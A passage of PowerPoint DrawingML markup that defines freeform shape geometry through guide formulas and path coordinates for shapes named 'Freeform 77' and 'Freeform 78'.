                  <a:gd name="T26" fmla="*/ 116 w 574"/>
                  <a:gd name="T27" fmla="*/ 503 h 531"/>
                  <a:gd name="T28" fmla="*/ 53 w 574"/>
                  <a:gd name="T29" fmla="*/ 440 h 531"/>
                  <a:gd name="T30" fmla="*/ 32 w 574"/>
                  <a:gd name="T31" fmla="*/ 414 h 531"/>
                  <a:gd name="T32" fmla="*/ 6 w 574"/>
                  <a:gd name="T33" fmla="*/ 356 h 531"/>
                  <a:gd name="T34" fmla="*/ 0 w 574"/>
                  <a:gd name="T35" fmla="*/ 330 h 531"/>
                  <a:gd name="T36" fmla="*/ 6 w 574"/>
                  <a:gd name="T37" fmla="*/ 283 h 531"/>
                  <a:gd name="T38" fmla="*/ 16 w 574"/>
                  <a:gd name="T39" fmla="*/ 236 h 531"/>
                  <a:gd name="T40" fmla="*/ 42 w 574"/>
                  <a:gd name="T41" fmla="*/ 194 h 531"/>
                  <a:gd name="T42" fmla="*/ 79 w 574"/>
                  <a:gd name="T43" fmla="*/ 157 h 531"/>
                  <a:gd name="T44" fmla="*/ 163 w 574"/>
                  <a:gd name="T45" fmla="*/ 89 h 531"/>
                  <a:gd name="T46" fmla="*/ 253 w 574"/>
                  <a:gd name="T47" fmla="*/ 31 h 531"/>
                  <a:gd name="T48" fmla="*/ 300 w 574"/>
                  <a:gd name="T49" fmla="*/ 10 h 531"/>
                  <a:gd name="T50" fmla="*/ 347 w 574"/>
                  <a:gd name="T51" fmla="*/ 0 h 531"/>
                  <a:gd name="T52" fmla="*/ 394 w 574"/>
                  <a:gd name="T53" fmla="*/ 4 h 531"/>
                  <a:gd name="T54" fmla="*/ 436 w 574"/>
                  <a:gd name="T55" fmla="*/ 15 h 531"/>
                  <a:gd name="T56" fmla="*/ 457 w 574"/>
                  <a:gd name="T57" fmla="*/ 31 h 531"/>
                  <a:gd name="T58" fmla="*/ 504 w 574"/>
                  <a:gd name="T59" fmla="*/ 67 h 531"/>
                  <a:gd name="T60" fmla="*/ 525 w 574"/>
                  <a:gd name="T61" fmla="*/ 94 h 531"/>
                  <a:gd name="T62" fmla="*/ 567 w 574"/>
                  <a:gd name="T63" fmla="*/ 167 h 531"/>
                  <a:gd name="T64" fmla="*/ 573 w 574"/>
                  <a:gd name="T65" fmla="*/ 188 h 531"/>
                  <a:gd name="T66" fmla="*/ 562 w 574"/>
                  <a:gd name="T67" fmla="*/ 272 h 531"/>
                  <a:gd name="T68" fmla="*/ 541 w 574"/>
                  <a:gd name="T69" fmla="*/ 314 h 531"/>
                  <a:gd name="T70" fmla="*/ 510 w 574"/>
                  <a:gd name="T71" fmla="*/ 351 h 531"/>
                  <a:gd name="T72" fmla="*/ 420 w 574"/>
                  <a:gd name="T73" fmla="*/ 430 h 531"/>
                  <a:gd name="T74" fmla="*/ 226 w 574"/>
                  <a:gd name="T75" fmla="*/ 220 h 531"/>
                  <a:gd name="T76" fmla="*/ 426 w 574"/>
                  <a:gd name="T77" fmla="*/ 251 h 531"/>
                  <a:gd name="T78" fmla="*/ 441 w 574"/>
                  <a:gd name="T79" fmla="*/ 236 h 531"/>
                  <a:gd name="T80" fmla="*/ 452 w 574"/>
                  <a:gd name="T81" fmla="*/ 214 h 531"/>
                  <a:gd name="T82" fmla="*/ 457 w 574"/>
                  <a:gd name="T83" fmla="*/ 183 h 531"/>
                  <a:gd name="T84" fmla="*/ 457 w 574"/>
                  <a:gd name="T85" fmla="*/ 167 h 531"/>
                  <a:gd name="T86" fmla="*/ 447 w 574"/>
                  <a:gd name="T87" fmla="*/ 151 h 531"/>
                  <a:gd name="T88" fmla="*/ 415 w 574"/>
                  <a:gd name="T89" fmla="*/ 125 h 531"/>
                  <a:gd name="T90" fmla="*/ 400 w 574"/>
                  <a:gd name="T91" fmla="*/ 125 h 531"/>
                  <a:gd name="T92" fmla="*/ 383 w 574"/>
                  <a:gd name="T93" fmla="*/ 125 h 531"/>
                  <a:gd name="T94" fmla="*/ 347 w 574"/>
                  <a:gd name="T95" fmla="*/ 136 h 531"/>
                  <a:gd name="T96" fmla="*/ 294 w 574"/>
                  <a:gd name="T97" fmla="*/ 173 h 531"/>
                  <a:gd name="T98" fmla="*/ 383 w 574"/>
                  <a:gd name="T99" fmla="*/ 288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74" h="531">
                    <a:moveTo>
                      <a:pt x="189" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="426" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="251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6" name="Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2947988" y="5394325"/>
                <a:ext cx="225425" cy="171450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 515 w 626"/>
                  <a:gd name="T1" fmla="*/ 104 h 478"/>
                  <a:gd name="T2" fmla="*/ 457 w 626"/>
                  <a:gd name="T3" fmla="*/ 152 h 478"/>
                  <a:gd name="T4" fmla="*/ 457 w 626"/>
                  <a:gd name="T5" fmla="*/ 157 h 478"/>
                  <a:gd name="T6" fmla="*/ 457 w 626"/>
                  <a:gd name="T7" fmla="*/ 157 h 478"/>
                  <a:gd name="T8" fmla="*/ 499 w 626"/>
                  <a:gd name="T9" fmla="*/ 152 h 478"/>
                  <a:gd name="T10" fmla="*/ 541 w 626"/>
                  <a:gd name="T11" fmla="*/ 152 h 478"/>
                  <a:gd name="T12" fmla="*/ 541 w 626"/>
                  <a:gd name="T13" fmla="*/ 152 h 478"/>
                  <a:gd name="T14" fmla="*/ 562 w 626"/>
                  <a:gd name="T15" fmla="*/ 157 h 478"/>
                  <a:gd name="T16" fmla="*/ 578 w 626"/>
                  <a:gd name="T17" fmla="*/ 168 h 478"/>
                  <a:gd name="T18" fmla="*/ 594 w 626"/>
                  <a:gd name="T19" fmla="*/ 178 h 478"/>
                  <a:gd name="T20" fmla="*/ 610 w 626"/>
                  <a:gd name="T21" fmla="*/ 194 h 478"/>
                  <a:gd name="T22" fmla="*/ 610 w 626"/>
                  <a:gd name="T23" fmla="*/ 194 h 478"/>
                  <a:gd name="T24" fmla="*/ 620 w 626"/>
                  <a:gd name="T25" fmla="*/ 204 h 478"/>
                  <a:gd name="T26" fmla="*/ 620 w 626"/>
                  <a:gd name="T27" fmla="*/ 204 h 478"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 215 h 478"/>
                  <a:gd name="T30" fmla="*/ 520 w 626"/>
                  <a:gd name="T31" fmla="*/ 304 h 478"/>
                  <a:gd name="T32" fmla="*/ 520 w 626"/>
                  <a:gd name="T33" fmla="*/ 304 h 478"/>
                  <a:gd name="T34" fmla="*/ 510 w 626"/>
                  <a:gd name="T35" fmla="*/ 288 h 478"/>
                  <a:gd name="T36" fmla="*/ 510 w 626"/>
                  <a:gd name="T37" fmla="*/ 288 h 478"/>
                  <a:gd name="T38" fmla="*/ 494 w 626"/>
                  <a:gd name="T39" fmla="*/ 272 h 478"/>
                  <a:gd name="T40" fmla="*/ 494 w 626"/>
                  <a:gd name="T41" fmla="*/ 272 h 478"/>
                  <a:gd name="T42" fmla="*/ 467 w 626"/>
                  <a:gd name="T43" fmla="*/ 246 h 478"/>
                  <a:gd name="T44" fmla="*/ 467 w 626"/>
                  <a:gd name="T45" fmla="*/ 246 h 478"/>
                  <a:gd name="T46" fmla="*/ 447 w 626"/>
                  <a:gd name="T47" fmla="*/ 236 h 478"/>
                  <a:gd name="T48" fmla="*/ 431 w 626"/>
                  <a:gd name="T49" fmla="*/ 231 h 478"/>
                  <a:gd name="T50" fmla="*/ 431 w 626"/>
                  <a:gd name="T51" fmla="*/ 231 h 478"/>
                  <a:gd name="T52" fmla="*/ 410 w 626"/>
                  <a:gd name="T53" fmla="*/ 231 h 478"/>
                  <a:gd name="T54" fmla="*/ 389 w 626"/>
                  <a:gd name="T55" fmla="*/ 231 h 478"/>
                  <a:gd name="T56" fmla="*/ 389 w 626"/>
                  <a:gd name="T57" fmla="*/ 231 h 478"/>
                  <a:gd name="T58" fmla="*/ 368 w 626"/>
                  <a:gd name="T59" fmla="*/ 241 h 478"/>
                  <a:gd name="T60" fmla="*/ 347 w 626"/>
                  <a:gd name="T61" fmla="*/ 257 h 478"/>
                  <a:gd name="T62" fmla="*/ 95 w 626"/>
                  <a:gd name="T63" fmla="*/ 477 h 478"/>
                  <a:gd name="T64" fmla="*/ 0 w 626"/>
                  <a:gd name="T65" fmla="*/ 367 h 478"/>
                  <a:gd name="T66" fmla="*/ 426 w 626"/>
                  <a:gd name="T67" fmla="*/ 0 h 478"/>
                  <a:gd name="T68" fmla="*/ 515 w 626"/>
                  <a:gd name="T69" fmla="*/ 104 h 4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26" h="478">
                    <a:moveTo>
                      <a:pt x="515" y="104"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="104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7" name="Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3041650" y="5505450"/>
                <a:ext cx="215900" cy="227013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 263 w 599"/>
                  <a:gd name="T1" fmla="*/ 53 h 631"/>
                  <a:gd name="T2" fmla="*/ 331 w 599"/>
                  <a:gd name="T3" fmla="*/ 5 h 631"/>
                  <a:gd name="T4" fmla="*/ 362 w 599"/>
                  <a:gd name="T5" fmla="*/ 0 h 631"/>
                  <a:gd name="T6" fmla="*/ 399 w 599"/>
                  <a:gd name="T7" fmla="*/ 0 h 631"/>
                  <a:gd name="T8" fmla="*/ 462 w 599"/>
                  <a:gd name="T9" fmla="*/ 26 h 631"/>
                  <a:gd name="T10" fmla="*/ 494 w 599"/>
                  <a:gd name="T11" fmla="*/ 48 h 631"/>
                  <a:gd name="T12" fmla="*/ 520 w 599"/>
                  <a:gd name="T13" fmla="*/ 74 h 631"/>
                  <a:gd name="T14" fmla="*/ 583 w 599"/>
                  <a:gd name="T15" fmla="*/ 158 h 631"/>
                  <a:gd name="T16" fmla="*/ 598 w 599"/>
                  <a:gd name="T17" fmla="*/ 195 h 631"/>
                  <a:gd name="T18" fmla="*/ 598 w 599"/>
                  <a:gd name="T19" fmla="*/ 231 h 631"/>
                  <a:gd name="T20" fmla="*/ 578 w 599"/>
                  <a:gd name="T21" fmla="*/ 289 h 631"/>
                  <a:gd name="T22" fmla="*/ 562 w 599"/>
                  <a:gd name="T23" fmla="*/ 315 h 631"/>
                  <a:gd name="T24" fmla="*/ 321 w 599"/>
                  <a:gd name="T25" fmla="*/ 546 h 631"/>
                  <a:gd name="T26" fmla="*/ 278 w 599"/>
                  <a:gd name="T27" fmla="*/ 588 h 631"/>
                  <a:gd name="T28" fmla="*/ 257 w 599"/>
                  <a:gd name="T29" fmla="*/ 630 h 631"/>
                  <a:gd name="T30" fmla="*/ 163 w 599"/>
                  <a:gd name="T31" fmla="*/ 530 h 631"/>
                  <a:gd name="T32" fmla="*/ 174 w 599"/>
                  <a:gd name="T33" fmla="*/ 504 h 631"/>
                  <a:gd name="T34" fmla="*/ 189 w 599"/>
                  <a:gd name="T35" fmla="*/ 478 h 631"/>
                  <a:gd name="T36" fmla="*/ 147 w 599"/>
                  <a:gd name="T37" fmla="*/ 483 h 631"/>
                  <a:gd name="T38" fmla="*/ 110 w 599"/>
                  <a:gd name="T39" fmla="*/ 473 h 631"/>
                  <a:gd name="T40" fmla="*/ 74 w 599"/>
                  <a:gd name="T41" fmla="*/ 452 h 631"/>
                  <a:gd name="T42" fmla="*/ 42 w 599"/>
                  <a:gd name="T43" fmla="*/ 420 h 631"/>
                  <a:gd name="T44" fmla="*/ 5 w 599"/>
                  <a:gd name="T45" fmla="*/ 368 h 631"/>
                  <a:gd name="T46" fmla="*/ 0 w 599"/>
                  <a:gd name="T47" fmla="*/ 336 h 631"/>
                  <a:gd name="T48" fmla="*/ 5 w 599"/>
                  <a:gd name="T49" fmla="*/ 310 h 631"/>
                  <a:gd name="T50" fmla="*/ 27 w 599"/>
                  <a:gd name="T51" fmla="*/ 257 h 631"/>
                  <a:gd name="T52" fmla="*/ 42 w 599"/>
                  <a:gd name="T53" fmla="*/ 236 h 631"/>
                  <a:gd name="T54" fmla="*/ 63 w 599"/>
                  <a:gd name="T55" fmla="*/ 216 h 631"/>
                  <a:gd name="T56" fmla="*/ 116 w 599"/>
                  <a:gd name="T57" fmla="*/ 173 h 631"/>
                  <a:gd name="T58" fmla="*/ 142 w 599"/>
                  <a:gd name="T59" fmla="*/ 163 h 631"/>
                  <a:gd name="T60" fmla="*/ 168 w 599"/>
                  <a:gd name="T61" fmla="*/ 158 h 631"/>
                  <a:gd name="T62" fmla="*/ 226 w 599"/>
                  <a:gd name="T63" fmla="*/ 168 h 631"/>
                  <a:gd name="T64" fmla="*/ 252 w 599"/>
                  <a:gd name="T65" fmla="*/ 179 h 631"/>
                  <a:gd name="T66" fmla="*/ 357 w 599"/>
                  <a:gd name="T67" fmla="*/ 242 h 631"/>
                  <a:gd name="T68" fmla="*/ 383 w 599"/>
                  <a:gd name="T69" fmla="*/ 252 h 631"/>
                  <a:gd name="T70" fmla="*/ 404 w 599"/>
                  <a:gd name="T71" fmla="*/ 257 h 631"/>
                  <a:gd name="T72" fmla="*/ 446 w 599"/>
                  <a:gd name="T73" fmla="*/ 236 h 631"/>
                  <a:gd name="T74" fmla="*/ 462 w 599"/>
                  <a:gd name="T75" fmla="*/ 216 h 631"/>
                  <a:gd name="T76" fmla="*/ 472 w 599"/>
                  <a:gd name="T77" fmla="*/ 195 h 631"/>
                  <a:gd name="T78" fmla="*/ 467 w 599"/>
                  <a:gd name="T79" fmla="*/ 168 h 631"/>
                  <a:gd name="T80" fmla="*/ 446 w 599"/>
                  <a:gd name="T81" fmla="*/ 142 h 631"/>
                  <a:gd name="T82" fmla="*/ 415 w 599"/>
                  <a:gd name="T83" fmla="*/ 121 h 631"/>
                  <a:gd name="T84" fmla="*/ 399 w 599"/>
                  <a:gd name="T85" fmla="*/ 121 h 631"/>
                  <a:gd name="T86" fmla="*/ 352 w 599"/>
                  <a:gd name="T87" fmla="*/ 142 h 631"/>
                  <a:gd name="T88" fmla="*/ 252 w 599"/>
                  <a:gd name="T89" fmla="*/ 63 h 631"/>
                  <a:gd name="T90" fmla="*/ 315 w 599"/>
                  <a:gd name="T91" fmla="*/ 315 h 631"/>
                  <a:gd name="T92" fmla="*/ 289 w 599"/>
                  <a:gd name="T93" fmla="*/ 299 h 631"/>
                  <a:gd name="T94" fmla="*/ 252 w 599"/>
                  <a:gd name="T95" fmla="*/ 284 h 631"/>
                  <a:gd name="T96" fmla="*/ 226 w 599"/>
                  <a:gd name="T97" fmla="*/ 279 h 631"/>
                  <a:gd name="T98" fmla="*/ 168 w 599"/>
                  <a:gd name="T99" fmla="*/ 305 h 631"/>
                  <a:gd name="T100" fmla="*/ 147 w 599"/>
                  <a:gd name="T101" fmla="*/ 326 h 631"/>
                  <a:gd name="T102" fmla="*/ 137 w 599"/>
                  <a:gd name="T103" fmla="*/ 352 h 631"/>
                  <a:gd name="T104" fmla="*/ 137 w 599"/>
                  <a:gd name="T105" fmla="*/ 373 h 631"/>
                  <a:gd name="T106" fmla="*/ 147 w 599"/>
                  <a:gd name="T107" fmla="*/ 399 h 631"/>
                  <a:gd name="T108" fmla="*/ 174 w 599"/>
                  <a:gd name="T109" fmla="*/ 415 h 631"/>
                  <a:gd name="T110" fmla="*/ 189 w 599"/>
                  <a:gd name="T111" fmla="*/ 420 h 631"/>
                  <a:gd name="T112" fmla="*/ 204 w 599"/>
                  <a:gd name="T113" fmla="*/ 426 h 631"/>
                  <a:gd name="T114" fmla="*/ 236 w 599"/>
                  <a:gd name="T115" fmla="*/ 426 h 631"/>
                  <a:gd name="T116" fmla="*/ 257 w 599"/>
                  <a:gd name="T117" fmla="*/ 415 h 631"/>
                  <a:gd name="T118" fmla="*/ 352 w 599"/>
                  <a:gd name="T119" fmla="*/ 326 h 631"/>
                  <a:gd name="T120" fmla="*/ 315 w 599"/>
                  <a:gd name="T121" fmla="*/ 315 h 6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599" h="631">
                    <a:moveTo>
                      <a:pt x="263" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
